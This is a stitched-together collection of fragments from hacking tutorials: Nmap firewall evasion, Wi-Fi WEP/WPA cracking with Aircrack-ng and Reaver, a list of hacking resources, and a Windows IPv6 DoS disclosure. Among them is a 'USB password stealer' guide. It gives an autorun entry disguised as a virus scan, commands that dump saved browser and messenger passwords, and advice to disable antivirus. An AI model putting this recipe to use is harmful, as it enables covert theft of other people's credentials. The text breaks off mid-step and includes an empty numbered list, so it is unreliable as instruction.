Nmap Evade Firewall & Scripting Nmap is the most powerful scanner that is used to perform so many functions including port scanning, service detection, and even vulnerability detection. Nmap from beginner to advanced has covered many basic concepts and commands, and in this second part of this series of articles I will discuss some advanced techniques of Nmap. How to Evade a Firewall/IDS Firewalls and IDS (intrusion detection systems) normally play an important role to defend the remote target very well from a security point of view because these hardwares and softwares are capable of blocking the intrusion, but in the case of penetration testing you need to bypass these tools to get the right result otherwise you will be misled. Host based firewall (A firewall is running on a single target computer, for example you are running a firewall on your computer)Network based firewall (A firewall has been installed and is running to protect the entire network and has been deployed at the node of the network, it might be LAN)
101 Free Admin Tools We know administrators love tools that make life easier – especially when they’re free! So here are 101 of them! System and network analysis 1. Using this MMC snap-in you can quickly visualize the user and group permissions of a local or remote folder or drive in a hierarchical format to help identify problems. 2. Wi-Fi Inspector is a powerful Wi-Fi management and troubleshooting tool that allows you to locate and verify Wi-Fi devices, detect rogue Access Points, troubleshoot connections, and search for Wi-Fi networks. 3. Whois performs a lookup of the registration information of a given IP address or domain name. 4. ShareEnum allows you to scan and view the security settings of file shares on your network. 5. 6. 7. 8. 9. Hack-A-Vision: Cracking WEP/WPA/2 networks with Aircrack-ng [Linux] Now that you have hopefully installed the Aircrack-ng suite and familiarized yourself with some basic Linux commands, we can start cracking WEP and WPA1/2 networks to see the differences in security Wired Equivalent Privacy (WEP) and Wi-fi Protected Access (WPA) provide. Notice: This is purely for educational value, do not attempt this on a network you do not PERSONALLY own. If you do this on a public or private network that you do not have authorization to do so on, it is illegal and you will probably get caught. Now, lets start. Open up a new terminal and lets begin (all typed commands are underlined; read the notes section for optional commands): Make sure you have a "monitoring" interface, this means that your network interface (the thing that interacts with networks) can scan for open/encrypted networks. For further in-depth reading on cracking WEP networks, check out this paper. The aircrack-ng suite includes the below programs, try playing around with them.
Usb password stealer - Steal passwords on a Remote computer As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords.Things you will need? Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:Note:Kindly disable your antivirus before performing these steps1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive. 2. [autorun] open=launch.bat ACTION= Perform a Virus Scan save the Notepad and rename it from 3. start iepv.exe /stext iepv.txt
80+ Best Free Hacking Tutorials | Resources to Become Pro Hacker Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics. Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on web. Hacking is not only about knowing "how things work", but its about knowing "why things work that way" and "how can we challenge it". Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack Hacking For Dummies - Beginners Tutorials EBooks And Whitepapers
How To Crack A Wi-Fi Network’s WPA Password With Reaver Your Wi-Fi network is your convenient wireless gateway to the internet, and since you’re not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how easy it is to crack a WEP password, you probably secure your network using the more bulletproof WPA security protocol. Here’s the bad news: A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers’ current passwords with relative ease. Here’s how to crack a WPA or WPA2 password, step by step, with Reaver — and how to protect your network against Reaver attacks. In the first section of this post, I’ll walk through the steps required to crack a WPA password using Reaver. After that, I’ll explain how Reaver works, and what you can do to protect your network against Reaver attacks. Please enable JavaScript to watch this video. What You’ll Need The BackTrack 5 Live DVD. iwconfig
Win 7 DoS by RA Packets Added 9-15-2011: Win 8 Developer Preview is also vulnerable Added 5-30-2011: RA Guard Evasion Added 5-29-2011: FreeBSD is also vulnerable! Executive Summary This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details. Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN! As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. Responsible Disclosure I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately. CVE-2010-4669 - Router Advertisements Cause DoS in Windows Ctrl+C